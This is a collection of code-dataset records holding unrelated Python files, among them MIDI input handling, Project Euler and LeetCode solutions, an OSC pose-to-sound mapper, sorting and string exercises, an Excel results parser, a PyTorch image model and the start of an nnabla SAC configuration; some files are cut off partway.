\r\n\r\n self.midiMessages[cnt] = { 'pitch' : self.messagesFromMidiInstrument[note]['pitch'], \r\n 'starttick' : int(self.messagesFromMidiInstrument[note]['starttick']) ,\r\n 'endtick' : int(self.messagesFromMidiInstrument[offnote]['starttick']) , \r\n 'granularity' : 1, \r\n 'tie' : 0.00,\r\n 'velocity' : self.messagesFromMidiInstrument[note]['velocity'],\r\n 'duration' : int(self.messagesFromMidiInstrument[offnote]['starttick'] - self.messagesFromMidiInstrument[note]['starttick']),\r\n 'measure' : int( self.messagesFromMidiInstrument[note]['starttick'] / self.tsInfo['measureLength'] ) + 1,\r\n 'measureGranularity': round ( ( float(self.messagesFromMidiInstrument[note]['starttick']) / self.tsInfo['measureLength'] ) + 1, 2 ) , \r\n }\r\n cnt += 1\r\n break \r\n\r\n\r\n\r\n print() \r\n for note in self.midiMessages : \r\n \r\n print ( note,\r\n self.midiMessages[note]['pitch'], \r\n self.midiMessages[note]['starttick'],\r\n self.midiMessages[note]['endtick'], \r\n self.midiMessages[note]['granularity'], \r\n self.midiMessages[note]['tie'], \r\n self.midiMessages[note]['velocity'], \r\n self.midiMessages[note]['duration'], \r\n self.midiMessages[note]['measure'], \r\n self.midiMessages[note]['measureGranularity'],\r\n \r\n )\r\n\r\n\r\n\r\n#import djwatson_api\r\n#from djwatson_io import Note, Const\r\n\r\ncurrent_milli_time = lambda: int(round(time.time() * 1000000))\r\n\r\n\r\nclass PushMidiMessages(threading.Thread):\r\n def __init__(self, flushIntervalInSec):\r\n super(PushMidiMessages, self).__init__()\r\n\r\n #self.queue = RecordQueue()\r\n self.kill_received = False\r\n self.flushTrigger = None\r\n self.flushIntervalInSec = flushIntervalInSec\r\n\r\n def run(self):\r\n\r\n\r\n for msg in inport: # nonblocking; flush out buffered msgs and return immediately\r\n\r\n # if self.flushTrigger == None and (msg.type == 'note_on' or msg.type == 'note_off'):\r\n # self.flushTrigger = FlushTrigger(self.queue, self.flushIntervalInSec)\r\n # self.flushTrigger.start()\r\n\r\n# self.queue.lock.acquire()\r\n #print ( msg ) \r\n\r\n if msg.type == 'note_on':\r\n# if firstMsgTime == 0:\r\n# firstMsgTime = msg.time\r\n\r\n #self.queue.pushNote(msg.note, convertMsgTimeToTick(msg.time), msg.velocity)\r\n print(\"note on:\" , msg.note, \"time: \", msg.time, \"velocity: \" , msg.velocity)\r\n\r\n elif msg.type == 'note_off':\r\n print(\"note off:\" , msg.note, \"time: \", msg.time, \"velocity: \" , msg.velocity)\r\n\r\n #self.queue.releaseNote(msg.note, convertMsgTimeToTick(msg.time))\r\n\r\n# self.queue.lock.release()\r\n#\r\n# if (msg.type == 'note_on' or msg.type == 'note_off') and self.flushTrigger.trigger == True:\r\n# if self.flushTrigger.pendingTrigger == True:\r\n# self.flushTrigger.attemptFlush()\r\n# else:\r\n# self.flushTrigger = None\r\n\r\n\r\n\r\nif __name__ == '__main__' :\r\n\r\n\r\n\r\n\r\n quarternotePerMin = 75\r\n ticksPerQuarterNote = 480\r\n msgInterval = 240 # in # of ticks\r\n firstMsgTime = 0 # in seconds; will be set at the first note\r\n flushIntervalInSec = 3.0\r\n \r\n note_min = 21\r\n note_max = 108\r\n \r\n \r\n ticksPerTie = 240\r\n ticksPerPush = ticksPerTie * 10\r\n \r\n firstMsgTime = 0 \r\n milliSecPerTick = 60000.0 / quarternotePerMin / ticksPerQuarterNote\r\n\r\n\r\n midi = RecordMidi() \r\n midi.run() \r\n\r\n\r\n sys.exit(0) \r\n\r\n\r\n\r\n mido.set_backend('mido.backends.rtmidi')\r\n inport = mido.open_input()\r\n\r\n\r\n try:\r\n with mido.open_input() as port:\r\n print('Using {}'.format(port))\r\n print('Waiting for messages...')\r\n for message in port:\r\n 
print ( message.type, message.time, message.note, message.velocity ) \r\n #print('Received {}'.format(message))\r\n except KeyboardInterrupt:\r\n pass\r\n\r\n sys.exit(0) \r\n\r\n\r\n\r\n threads = []\r\n # pushMidi = PushMidiMessages(Const.flushIntervalInSec)\r\n pushMidi = PushMidiMessages(3.0)\r\n pushMidi.daemon = True\r\n\r\n threads.append(pushMidi)\r\n\r\n pushMidi.start()\r\n\r\n while True:\r\n try:\r\n pushMidi.join(1)\r\n # for t in threads:\r\n # if t.is_alive():\r\n # # print('joining thread: '+str(t))\r\n # t.join(1)\r\n except KeyboardInterrupt:\r\n # for t in threads:\r\n # t.kill_received = True\r\n break\r\n","sub_path":"src/DevServer/midi_input.py","file_name":"midi_input.py","file_ext":"py","file_size_in_byte":18108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"11324834","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 24 07:56:28 2017\n\n@author: Administrator\n\"\"\"\n\ndef findMaximumXOR(nums):\n maxRes=0\n mask=0\n for i in range(5,-1,-1):\n #/The mask will grow like 100..000 , 110..000, 111..000,then 1111...111\n mask=mask|(1< c:\n if c < (a_b >> 1):\n return 0\n return c - ((a_b - 1) >> 1)\n return a_b >> 1\n\n\ndef main():\n pairs = []\n for a in range(1, 1000):\n for trio in euler.pythagorean_unique_trio(a):\n pairs.extend((trio[:2], trio[1::-1]))\n pairs.sort()\n count = 0\n c = 0\n while True:\n c += 1\n for pair in pairs:\n if pair[0] > c:\n break\n if c % pair[0] == 0:\n d = c // pair[0]\n count += count_of_c(c, pair[1] * d)\n if count > LIMIT:\n return c\n\n\nif __name__ == '__main__':\n print(main())\n","sub_path":"python/problem86.py","file_name":"problem86.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"490461173","text":"from pythonosc.dispatcher import Dispatcher\nfrom pythonosc.osc_server import BlockingOSCUDPServer\nfrom pythonosc.udp_client import SimpleUDPClient\nfrom functools import partial\nimport time\nimport math\n\nip = \"127.0.0.1\"\nport = 6669\nclient = SimpleUDPClient(ip, port)\n\n# Constants\nparts = ['nose', 'leftEye', 'rightEye', 'leftEar', 'rightEar',\n 'leftShoulder', 'rightShoulder', 'leftElbow', 'rightElbow',\n 'leftWrist', 'rightWrist', 'leftHip', 'rightHip', 'leftKnee',\n 'rightKnee', 'leftAnkle', 'rightAnkle']\nnumparts = len(parts)\npart2idx = {p: i for i, p in enumerate(parts)}\nidx2part = {i: p for i, p in enumerate(parts)}\n\nparams = ['r_arm_height', 'l_arm_height']\n\n\ndef clamp(value, lower, upper):\n return lower if value < lower else upper if value > upper else value\n\n\ndef lerp(a, b, t):\n return (1.0 - t) * a + b * t\n\n\ndef inv_lerp(a, b, v):\n return (v - a) / (b - a)\n\n\ndef remap(in_range, out_range, v):\n t = inv_lerp(in_range[0], in_range[1], v)\n return lerp(out_range[0], out_range[1], t)\n\n\npose = {p: (-1, -1) for p in parts}\n\n\ndef update_pose(data):\n xp, yp = msg2data(data)\n for i, (x, y) in enumerate(zip(xp, yp)):\n if x > -1 and y > -1:\n pose[idx2part[i]] = (x, y)\n\n\ndef center_of_mass(pose):\n xp = [\n p[0] for p in [\n pose[part] for part in [\n \"leftShoulder\",\n \"rightShoulder\",\n \"leftHip\",\n \"rightHip\"]]]\n yp = [\n p[1] for p in [\n pose[part] for part in [\n \"leftShoulder\",\n \"rightShoulder\",\n \"leftHip\",\n \"rightHip\"]]]\n\n avgx = sum(xp) / 4\n avgy = sum(yp) / 4\n return avgx, avgy\n\n\ndef params_dict(pose):\n pdict = {}\n\n pdict[\"l_arm_height\"] = clamp(\n pose[\"leftWrist\"][1],\n 
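# clamp the wrist y between the nose (top) and the hip (bottom)\n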
pose[\"nose\"][1],\n pose[\"leftHip\"][1])\n pdict[\"l_arm_height\"] = inv_lerp(pose[\"nose\"][1],\n pose[\"leftHip\"][1],\n pdict[\"l_arm_height\"])\n return pdict\n\n\ndef writelns(filename, lines):\n with open(filename, 'a') as file:\n for line in lines:\n file.write(line + \"\\n\")\n\n\ndef handle_msg(addr, *args):\n update_pose(args)\n pose_param = params_dict(pose)\n client.send_message(\"/fs1/lpf\", [pose_param['l_arm_height'] + 300, 1])\n print(pose_param[\"l_arm_height\"])\n\n\ndef msg2data(args):\n x_points = [-1 for i in range(numparts)]\n y_points = [-1 for i in range(numparts)]\n for i in range(0, len(args), 3):\n part = args[i]\n\n x = float(args[i + 1])\n x_points[part2idx[part]] = x\n\n y = float(args[i + 2])\n y_points[part2idx[part]] = y\n\n return x_points, y_points\n\n\nif __name__ == \"__main__\":\n ip = \"127.0.0.1\"\n port = 6666\n\n dispatcher = Dispatcher()\n dispatcher.map(\"/pose/*\", handle_msg)\n # dispatcher.set_default_handler(println)\n\n # Blocking server ensures messages handled in order\n server = BlockingOSCUDPServer((ip, port), dispatcher)\n server.serve_forever()\n","sub_path":"params.py","file_name":"params.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"582313517","text":"import statistics\nfrom Cromossomo import Cromossomo\n\ndef salvar_dados(nome_arquivo,lista_resultado): \n precisao_casas_decimais = 6\n \n with open(nome_arquivo + \".csv\", \"w\") as arquivo:\n #Cabeçalho\n arquivo.write(\" \")\n for i in range(len(lista_resultado)):\n arquivo.write(\"Execucao\" + str(i+1) + \" \") \n arquivo.write(\"Media\"+ \" \")\n arquivo.write(\"Melhor\" + \" \")\n arquivo.write('\\n')\n\n #Conteudo\n for i in range(len(lista_resultado[0])):\n data = []\n arquivo.write(str(i + 1) + \" \")\n for lista in lista_resultado:\n particula_global = round(lista[i].get_aptidao(),4)\n particula_global = round(particula_global,precisao_casas_decimais)\n data.append(particula_global)\n arquivo.write(str(particula_global).replace('.',',') + \" \")\n\n lista = sorted(data , key=lambda t: t)\n \n #Media\n media = round(statistics.mean(data),4)\n arquivo.write(str(media).replace('.',',') + \" \")\n\n #Melhor\n menor = round(lista[0],4)\n arquivo.write(str(menor).replace('.',',') + \" \")\n\n # #xBest\n # xBest = lista[0].x_best\n # arquivo.write(str(xBest).replace('.',',') + \" \")\n\n arquivo.write('\\n')","sub_path":"persistencia.py","file_name":"persistencia.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"610535537","text":"from sort_analyser import random_list_generator, measure_runtime, select_function\n\n\ndef menu():\n print(\"----------------------- Welcome to sorting algorithm analyser -----------------------\\n\")\n select_options()\n\n user_input = int(input(\"Enter option: \"))\n size = int(input(\"\\nEnter the size of list to be created: \"))\n maximum_num = int(input(\"Enter the maximum number to be created in the list: \"))\n print()\n run = select_function(user_input) # returns a sort function object\n\n while user_input != 0:\n if user_input == 1: # bubble sort\n gen_list = random_list_generator(size, maximum_num) # generates array\n return measure_runtime(run, gen_list)\n\n elif user_input == 2: # insertion sort\n gen_list = random_list_generator(size, maximum_num) # generates array\n return measure_runtime(run, gen_list)\n\n elif user_input == 3: # merge 
sort\n gen_list = random_list_generator(size, maximum_num) # generates array\n return measure_runtime(run, gen_list)\n\n elif user_input == 4: # quick sort\n gen_list = random_list_generator(size, maximum_num) # generates array\n return measure_runtime(run, gen_list)\n\n elif user_input == 5: # python's sorting function\n gen_list = random_list_generator(size, maximum_num) # generates array\n return measure_runtime(run, gen_list)\n\n elif user_input == 6: # run all sorting functions\n gen_list = random_list_generator(size, maximum_num) # generates array\n for functions in run:\n res = [measure_runtime(functions, gen_list)]\n return res\n\n select_options() # display a list of options for the user to choose from\n user_input = int(input(\"\\nSelect from the menu: \"))\n\n\ndef select_options():\n print(\"____________________________________\\n\"\n \"| 1. Bubble sort |\\n\"\n \"| 2. Insertion sort |\\n\"\n \"| 3. Merge sort |\\n\"\n \"| 4. Quick Sort |\\n\"\n \"| 5. Python's sorted Function |\\n\"\n \"| 6. Run all function |\\n\"\n \"| 0. Exit application |\\n\"\n \"|__________________________________|\")\n\n\nif __name__ == '__main__':\n menu()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"91629307","text":"print()\n\nkata = input(\"Input: \")\ntemp = \"\"\n\nfor i in range(len(kata)-1, -1, -1): # loop from the last character / letter backwards\n temp+=kata[i]\n\nprint(\"Output: \", end=\"\")\nif(kata == temp): # check the condition by comparing the two variables\n print(\"True\")\nelse:\n print(\"False\")","sub_path":"nomor3.py","file_name":"nomor3.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"47858755","text":"from directedNode import DirectedNode\n\nclass Field:\n # Field is a wrapper for a group of DirectedNode-s. 
Handles group resets, group steps, and retrieval of values at any point in space via inverse distance weighting.\n\n nodes = [ DirectedNode( 0.50, 0.75, 0.35, 0.65, 0.00, 0.00, 0.00 ),\n DirectedNode( 0.75, 1.00, 0.75, 1.00, 0.00, 1.00, 0.00 ),\n\n DirectedNode( 0.25, 0.50, 0.35, 0.65, 1.00, 0.00, 1.00 ),\n DirectedNode( 0.00, 0.25, 0.50, 0.75, 1.00, 1.00, 1.00 ),\n\n DirectedNode( 0.75, 1.00, 0.00, 0.50, 0.00, 0.50, 0.00 ),\n DirectedNode( 0.00, 0.25, 0.50, 1.00, 1.00, 0.50, 1.00 ) ]\n\n def reset( self ):\n # Basic, reset all nodes\n\n for node in self.nodes:\n node.reset( )\n\n def step( self, perc ):\n # Basic, step all nodes to same percent\n\n for node in self.nodes:\n node.step( perc )\n\n def getVal( self, x, y ):\n # This uses inverse distance weighting to compute the value at the point given\n\n v = 0 # Value accum\n d = 0 # Distance accum\n td = 0 # Temp variable to save some typing\n\n for node in self.nodes:\n\n # If distance == 0\n if ( x == node.x ) and ( y == node.y ):\n\n # Just break, the value will be equal to the (first encountered) node\n v = node.val;\n d = -1\n break\n\n else:\n\n # Calculate a distance\n td = 1.0 / pow( pow( node.x - x, 2 ) + pow( node.y - y, 2 ), 2 ) # 1/ r^4\n v += td * node.val\n d += td\n\n # If we are not on top of a point\n # NOTE: We use -1 as a flag because the distance to an even power will never be negative\n if d > 0:\n v /= d\n\n # Return value\n return v\n","sub_path":"field.py","file_name":"field.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"604054501","text":"\"\"\"\nExercise 6: Given the following two sets find the intersection and remove those elements from the first set\nExpected Output:\n\nFirst Set {65, 42, 78, 83, 23, 57, 29}\nSecond Set {67, 73, 43, 48, 83, 57, 29}\n\nIntersection is {57, 83, 29}\nFirst Set after removing common element {65, 42, 78, 23}\n\"\"\"\n\nfirst = {65, 42, 78, 83, 23, 57, 29}\nsecond = {67, 73, 43, 48, 83, 57, 29}\n\nin_first_but_no_in_second = first - second\n\nprint(in_first_but_no_in_second)\n\nintersection = first & second\nprint(intersection)\n\n# #############################\n\nfirstSet = {23, 42, 65, 57, 78, 83, 29}\nsecondSet = {57, 83, 29, 67, 73, 43, 48}\n\nprint(\"First Set \", firstSet)\nprint(\"Second Set \", secondSet)\n\nintersection = firstSet.intersection(secondSet)\nprint(\"Intersection is \", intersection)\nfor item in intersection:\n firstSet.remove(item)\n\nprint(\"First Set after removing common element \", firstSet)","sub_path":"pynative/6_datastructure/ex_6.py","file_name":"ex_6.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"450865543","text":"from openpyxl import Workbook\nimport configparser\n\npar_list = [\n\"SensorName\",\n\"Temp\",\n\"Bias\",\n\"Resistance\",\n\"pulseArea\",\n\"pulseArea_Error\",\n\"Pmax\",\n\"Pmax_Error\",\n\"RMS\",\n\"RMS_Error\",\n\"Rise_Time\",\n\"Rise_Time_Error\",\n\"dvdt\",\n\"dvdt_Error\",\n\"FWHM\",\n\"FWHM_Error\",\n\"NewPulseArea\",\n\"NewPulseArea_Error\",\n\"FallTime\",\n\"FallTime_Error\"\n]\n\npar_dict = {\n\"SensorName\" : \"B\",\n\"Temp\" : \"G\",\n\"Bias\" : \"H\",\n\"Resistance\" : \"L\",\n\"pulseArea\" : \"J\",\n\"pulseArea_Error\" : \"K\",\n\"Pmax\" : \"R\",\n\"Pmax_Error\" : \"S\",\n\"RMS\" : \"T\",\n\"RMS_Error\" : \"U\",\n\"Rise_Time\" : \"Z\",\n\"Rise_Time_Error\" : \"AA\",\n\"dvdt\" : \"AB\",\n\"dvdt_Error\" : \"AC\",\n\"FWHM\" : 
\"AL\",\n\"FWHM_Error\" : \"AM\",\n\"NewPulseArea\" : \"CA\",\n\"NewPulseArea_Error\" : \"CB\",\n\"FallTime\" : \"DG\",\n\"FallTime_Error\" : \"DH\",\n\"cycle\" : \"F\"\n}\n\nconfig = configparser.ConfigParser()\nconfig.read(\"_results.ini\")\nconfig_section = config.sections()\nprint(config_section)\n\nwb = Workbook()\nws = wb.active\nrowCounter = 1\ndut_trig = [\"DUT\", \"Trig\"]\n\nRunNum = 100\nSensorName = \"Hi\"\nTemp = 20\nResistance = 4700\ntrigBias = 395\n\nfor ch in dut_trig:\n for bias in config_section:\n if ch in bias:\n if ch != \"Trig\":\n if \"..\" in bias:\n Bias = bias[bias.find(\"_\")+1:bias.find(\"V\")]\n cycle = bias.split(\"..\")[1]\n if \"_\" in cycle:\n cycle = cycle.split(\"_\")[0]\n else:\n Bias = bias[bias.find(\"_\")+1:bias.find(\"V\")]\n cycle = 1\n else:\n #Bias = trigBias\n try:\n Bias = config[bias][\"trigger_bias\"]\n if \"..\" in bias:\n cycle = bias.split(\"..\")[1]\n if \"_\" in cycle:\n cycle = cycle.split(\"_\")[0]\n else:\n cycle = 1\n except:\n Bias = -390\n cycle = 1\n for par in par_list:\n if (par == \"SensorName\"):\n cell = par_dict[par] + str(rowCounter)\n ws[cell] = SensorName\n elif (par == \"Temp\"):\n try:\n Temp = config[bias][\"temperature\"]\n except:\n Temp = \"-30\"\n cell = par_dict[par] + str(rowCounter)\n ws[cell] = float(Temp)\n elif (par == \"Bias\"):\n cell = par_dict[par] + str(rowCounter)\n ws[cell] = float(Bias)\n if cycle:\n cell = par_dict[\"cycle\"] + str(rowCounter)\n ws[cell] = int(cycle)\n elif (par == \"Resistance\"):\n cell = par_dict[par] + str(rowCounter)\n ws[cell] = float(Resistance)\n else:\n cell = par_dict[par] + str(rowCounter)\n ws[cell] = float(config[bias][par])\n rowCounter+=1\n rowCounter+=1\n\nwb.save(\"_results.xlsx\")\n","sub_path":"scripts/betaScope_pyScript/parseBetaResultsToExcel.py","file_name":"parseBetaResultsToExcel.py","file_ext":"py","file_size_in_byte":3044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"430876259","text":"\"\"\"\r\n5. Seja o mesmo texto acima “splitado”. Calcule quantas palavras possuem uma das letras “python” e que tenham mais de 4\r\ncaracteres. Não se esqueça de transformar maiúsculas para minúsculas e de remover antes os caracteres especiais.\r\n\"\"\"\r\n__author__ = 'Leonardo Vinicius Maciel aka Sephyros'\r\n\r\nstatement = \"The Python Software Foundation and the global Python community welcome and encourage participation by \" \\\r\n \"everyone. Our community is based on mutual respect, tolerance, and encouragement, and we are working to \" \\\r\n \"help each other live up to these principles. 
We want our community to be more diverse: whoever you are, \" \\\r\n \"and whatever your background, we welcome you.\"\r\ni = 0\r\nnew_statement = \"\"\r\nwhile i < len(statement):\r\n if statement[i] in \".,:\":\r\n new_statement += \"\"\r\n else:\r\n new_statement += statement[i]\r\n i += 1\r\npalavras = []\r\nquantidade = 0\r\nsequencia = \"python\"\r\nfor palavra in new_statement.split():\r\n palavra_ok = False\r\n for letra in palavra:\r\n if letra in sequencia:\r\n palavra_ok = True\r\n break\r\n if palavra_ok and palavra.lower() not in palavras:\r\n palavras.append(palavra.lower())\r\npalavras.sort()\r\nfor palavra in palavras:\r\n if len(palavra) > 4:\r\n quantidade += 1\r\nprint(\"There are %d unique words with one of the letters of %s\" % (quantidade, sequencia))","sub_path":"PingMind/Python para Zumbis/Lista IV/questao05.py","file_name":"questao05.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"109469543","text":"import torch\nfrom .base_model import BaseModel\nfrom . import networks\nimport numpy as np\nimport os\n\n\nclass UnetResnetL2Model(BaseModel):\n @staticmethod\n def modify_commandline_options(parser, is_train=True):\n parser.set_defaults(norm='instance', norm_G='instance', netG='resnet_9blocks', dataset_mode='exr', input_nc=5, output_nc=2, preprocess='N.A.', image_type='exr', image_value_bound=26350, no_flip=True)\n parser.add_argument('--unet_residue', action='store_true', help='')\n parser.add_argument('--fixed_example', action='store_true', help='')\n parser.add_argument('--fixed_index', type=int, default=0, help='')\n parser.add_argument('--netU', type=str, default='unet_256')\n parser.add_argument('--unet_input_nc', type=int, default=3)\n parser.add_argument('--use_feature_extractor', action='store_true', help='')\n parser.add_argument('--break4', action='store_true', help='')\n return parser\n\n def __init__(self, opt):\n BaseModel.__init__(self, opt)\n # specify the training losses you want to print out. The training/test scripts will call \n self.loss_names = ['D_L2', 'G_L2']\n # specify the images you want to save/display. The training/test scripts will call \n self.visual_names = ['real_A', 'post_unet', 'fake_B', 'real_B']\n # specify the models you want to save to the disk. 
The training/test scripts will call and \n self.model_names = ['G']\n if opt.use_feature_extractor: self.model_names += ['Feature']\n self.preload_names = ['U']\n # define networks\n self.netU = networks.define_G(opt.unet_input_nc, opt.output_nc, opt.ngf, opt.netU, opt.norm_G,\n not opt.no_dropout, opt.init_type, opt.init_gain, self.gpu_ids, downsample_mode=opt.downsample_mode, upsample_mode=opt.upsample_mode, upsample_method=opt.upsample_method, linear=opt.linear)\n self.netG = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, opt.netG, opt.norm_G,\n not opt.no_dropout, opt.init_type, opt.init_gain, self.gpu_ids, downsample_mode=opt.downsample_mode, upsample_mode=opt.upsample_mode, upsample_method=opt.upsample_method, linear=opt.linear)\n if opt.use_feature_extractor:\n self.netFeature = networks.init_net(networks.FeatureExtractor(opt.output_nc), gpu_ids=self.gpu_ids)\n self.load_base_networks()\n\n if self.isTrain:\n # define loss functions\n self.criterionL2 = torch.nn.MSELoss()\n # initialize optimizers; schedulers will be automatically created by function .\n self.optimizer_G = torch.optim.Adam(self.netG.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\n self.optimizers.append(self.optimizer_G)\n if opt.use_feature_extractor:\n self.optimizer_Feature = torch.optim.Adam(self.netFeature.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\n self.optimizers.append(self.optimizer_Feature)\n\n def set_input(self, input):\n \"\"\"Unpack input data from the dataloader and perform necessary pre-processing steps.\n\n Parameters:\n input (dict): include the data itself and its metadata information.\n\n The option 'direction' can be used to swap images in domain A and domain B.\n \"\"\"\n AtoB = self.opt.direction == 'AtoB'\n self.real_A = input['A' if AtoB else 'B'].to(self.device)\n self.real_B = input['B' if AtoB else 'A'].to(self.device)\n self.real_B = 1 - torch.nn.ReLU()(2 - torch.nn.ReLU()(self.real_B + 1)) #clip to [-1, 1]\n self.image_paths = input['A_paths' if AtoB else 'B_paths']\n\n def forward(self):\n \"\"\"Run forward pass; called by both functions and .\"\"\"\n if self.opt.break4:\n self.real_A = self.break_into_4(self.real_A)\n self.real_B = self.break_into_4(self.real_B)\n self.post_unet = self.netU(self.real_A).detach()\n if self.opt.unet_residue:\n self.post_unet[:, 1, :, :] = self.post_unet[:, 1, :, :] + self.real_A[:, 0, :, :]\n self.fake_B = self.netG(torch.cat((self.real_A, self.post_unet), 1))\n self.fake_B = self.fake_B + self.post_unet\n\n def backward_D(self):\n if not self.opt.use_feature_extractor:\n self.loss_D_L2 = torch.zeros([1]).to(self.device)\n self.loss_D = self.loss_D_L2\n else:\n fake_B_features = self.netFeature(self.fake_B.detach())\n real_features = self.netFeature(self.real_B)\n self.loss_D_L2 = -self.criterionL2(fake_B_features, real_features) * 1000\n self.loss_D = -self.loss_D_L2 / self.loss_D_L2.item() * 2 / 1000\n self.loss_D.backward()\n\n def backward_G(self):\n self.loss_G_L2 = self.criterionL2(self.fake_B, self.real_B) * 1000\n if not self.opt.use_feature_extractor:\n self.loss_G = self.loss_G_L2 / 1000\n else:\n fake_B_output = self.netFeature(self.fake_B)\n real_B_output = self.netFeature(self.real_B)\n feat_loss = self.criterionL2(fake_B_output, real_B_output)\n self.loss_G = self.loss_G_L2 / 1000 + feat_loss / feat_loss.item() * self.loss_G_L2.item() / 1000\n self.loss_G.backward()\n\n def optimize_parameters(self):\n self.forward()\n if self.opt.use_feature_extractor:\n self.set_requires_grad(self.netFeature, True)\n 
self.optimizer_Feature.zero_grad()\n self.backward_D()\n if self.opt.use_feature_extractor:\n self.optimizer_Feature.step()\n self.set_requires_grad(self.netFeature, False)\n # update G\n self.optimizer_G.zero_grad()\n self.backward_G()\n self.optimizer_G.step()\n\n def compute_visuals(self, dataset=None):\n if not self.opt.fixed_example or dataset is None:\n return\n single = dataset.dataset.get_val_item(self.opt.fixed_index)\n AtoB = self.opt.direction == 'AtoB'\n self.real_A = single['A' if AtoB else 'B'].unsqueeze(0).to(self.device)\n self.real_B = single['B' if AtoB else 'A'].unsqueeze(0).to(self.device)\n self.image_paths = [single['A_paths' if AtoB else 'B_paths']]\n\n self.forward()\n if self.opt.break4:\n self.real_A = self.combine_from_4(self.real_A)\n self.real_B = self.combine_from_4(self.real_B)\n self.post_unet = self.combine_from_4(self.post_unet)\n self.fake_B = self.combine_from_4(self.fake_B)\n\n def __patch_instance_norm_state_dict(self, state_dict, module, keys, i=0):\n \"\"\"Fix InstanceNorm checkpoints incompatibility (prior to 0.4)\"\"\"\n key = keys[i]\n if i + 1 == len(keys): # at the end, pointing to a parameter/buffer\n if module.__class__.__name__.startswith('InstanceNorm') and \\\n (key == 'running_mean' or key == 'running_var'):\n if getattr(module, key) is None:\n state_dict.pop('.'.join(keys))\n if module.__class__.__name__.startswith('InstanceNorm') and \\\n (key == 'num_batches_tracked'):\n state_dict.pop('.'.join(keys))\n else:\n self.__patch_instance_norm_state_dict(state_dict, getattr(module, key), keys, i + 1)\n\n def load_base_networks(self):\n for name in self.preload_names:\n if isinstance(name, str):\n load_filename = 'base_net_%s.pth' % (name)\n load_path = os.path.join(self.save_dir, load_filename)\n net = getattr(self, 'net' + name)\n if isinstance(net, torch.nn.DataParallel):\n net = net.module\n print('loading the model from %s' % load_path)\n # if you are using PyTorch newer than 0.4 (e.g., built from\n # GitHub source), you can remove str() on self.device\n state_dict = torch.load(load_path, map_location=str(self.device))\n if hasattr(state_dict, '_metadata'):\n del state_dict._metadata\n\n # patch InstanceNorm checkpoints prior to 0.4\n for key in list(state_dict.keys()): # need to copy keys here because we mutate in loop\n self.__patch_instance_norm_state_dict(state_dict, net, key.split('.'))\n net.load_state_dict(state_dict)\n\n def break_into_4(self, image):\n return torch.cat(torch.chunk(torch.cat(torch.chunk(image, 2, dim=2), 0), 2, dim=3), 0)\n\n def combine_from_4(self, image):\n return torch.cat(torch.chunk(torch.cat(torch.chunk(image, 2, dim=0), 3), 2, dim=0), 2)\n","sub_path":"models/unet_resnet_L2_model.py","file_name":"unet_resnet_L2_model.py","file_ext":"py","file_size_in_byte":8824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"153482719","text":"# Copyright 2020,2021 Sony Corporation.\n# Copyright 2021 Sony Group Corporation.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the 
License.\n\nfrom dataclasses import dataclass\nfrom typing import Any, Dict, List, Optional, Union, cast\n\nimport gym\nimport numpy as np\n\nimport nnabla as nn\nimport nnabla.solvers as NS\nimport nnabla_rl.environment_explorers as EE\nimport nnabla_rl.model_trainers as MT\nfrom nnabla_rl.algorithm import Algorithm, AlgorithmConfig, eval_api\nfrom nnabla_rl.builders import ModelBuilder, ReplayBufferBuilder, SolverBuilder\nfrom nnabla_rl.environment_explorer import EnvironmentExplorer\nfrom nnabla_rl.environments.environment_info import EnvironmentInfo\nfrom nnabla_rl.model_trainers.model_trainer import ModelTrainer, TrainingBatch\nfrom nnabla_rl.models import QFunction, SACPolicy, SACQFunction, StochasticPolicy\nfrom nnabla_rl.replay_buffer import ReplayBuffer\nfrom nnabla_rl.utils import context\nfrom nnabla_rl.utils.data import add_batch_dimension, marshal_experiences, set_data_to_variable\nfrom nnabla_rl.utils.misc import create_variable, sync_model\n\n\n@dataclass\nclass SACConfig(AlgorithmConfig):\n '''SACConfig\n List of configurations for SAC algorithm\n\n Args:\n gamma (float): discount factor of rewards. Defaults to 0.99.\n learning_rate (float): learning rate which is set to all solvers. \\\n You can customize/override the learning rate for each solver by implementing the \\\n (:py:class:`SolverBuilder `) by yourself. \\\n Defaults to 0.0003.\n batch_size(int): training batch size. Defaults to 256.\n tau (float): target network's parameter update coefficient. Defaults to 0.005.\n environment_steps (int): Number of steps to interact with the environment on each iteration. Defaults to 1.\n gradient_steps (int): Number of parameter updates to perform on each iteration. Defaults to 1.\n target_entropy (float, optional): Target entropy value. Defaults to None.\n initial_temperature (float, optional): Initial value of temperature parameter. Defaults to None.\n fix_temperature (bool): If true the temperature parameter will not be trained. Defaults to False.\n start_timesteps (int): the timestep when training starts.\\\n The algorithm will collect 